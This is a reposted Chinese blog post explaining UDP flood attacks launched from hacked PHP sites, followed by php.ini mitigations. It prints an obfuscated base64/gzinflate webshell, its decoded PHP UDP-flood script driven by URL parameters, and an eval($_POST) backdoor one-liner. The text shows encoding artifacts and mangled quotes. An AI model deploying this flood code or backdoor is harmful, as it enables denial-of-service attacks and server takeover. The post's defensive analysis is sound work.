未測(cè)試

關(guān)于近期一些服務(wù)器遭受UDP攻擊的說明

近來我有一兩臺(tái)服務(wù)器顯示經(jīng)常受到udp攻擊

導(dǎo)致服務(wù)器帶寬占用到100%，用華盾查流量占用也無法查到具體是哪個(gè)站被攻擊了，起初以為是cc攻擊，因?yàn)橥Ｖ沽薸is帶寬就為0了，其實(shí)不然，都是部分用戶被入侵導(dǎo)致的

下面我想說一下被入侵的原理

用戶程序中的一個(gè)php頁面的原代碼:

< ?php

/*

gl

*/

eval(gzinflate(base64_decode(\’DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99D

Ofz6Bbek/SjOqkNtssCPNJkhTf2Xw6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm7

8dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLbVkzvPt3s0UMS3m

Dx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE

9L29swfGYibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDx

K10KYOfGAWN7s3geqB7RdV7WkxiBHZU4wyW0LXsmyTdcdwk3TOjduh1F8cyvsgY

uaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG3IHY4Txaem

BF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavO

lDW8/OMb7ci13dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgE

JNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCwxiZH1aaTMKJItxW5rmz4WyrGmOKCUt

LvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOuSJ+rRT

+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS

/TXCpeY1tyOl7Awe8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2Cn

KoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnubV2kpIarL4bMVgNxv+9QwM8j1FvNR

1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3chsJ4O

wQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/\’)));

?>

經(jīng)過N次解密后的代碼：

< ?php

$packets = 0;

$ip = $_GET[\’ip\’];

$rand = $_GET[\’port\’];

set_time_limit(0);

ignore_user_abort(FALSE);

$exec_time = $_GET[\’time\’];

$time = time();

print \”Flooded: $ip on port $rand
\”;

$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){

$out .= \”X\”;

}

while(1){

$packets++;

if(time() > $max_time){

break;

}

$fp = fsockopen(\”udp://$ip\”, $rand, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

}

echo \”Packet complete at \”.time(\’h:i:s\’).\” with $packets (\” . round(($packets*65)/1024, 2) . \” mB) packets averaging \”. round($packets/$exec_time, 2) . \” packets/s \\n\”;

?>

< ?php eval($_POST[ddos])?>

baidu了一下工作原理：

先把你代碼放到一個(gè)正常的網(wǎng)頁中.

通過url傳遞IP和端口以u(píng)dp的方式打開.傳遞文件到服務(wù)器寫出.

這樣服務(wù)器就中招了.

也就是服務(wù)器顯示udp攻擊，帶寬占用非常之嚴(yán)重，基本是100%，一般徘徊在97%-99%之間

解決方案：

在php.ini中限制php用網(wǎng)絡(luò)。

在php.ini里設(shè)其值為Off

allow_url_fopen = Off

并且:

;extension=php_sockets.dll

前面的;號(hào)一定要有,意思就是限制用sockets.dll

然后重啟IIS

總結(jié)

以上是生活随笔為你收集整理的php 获取带宽,php使用网络攻击占用超大带宽的，解决方案[转]的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。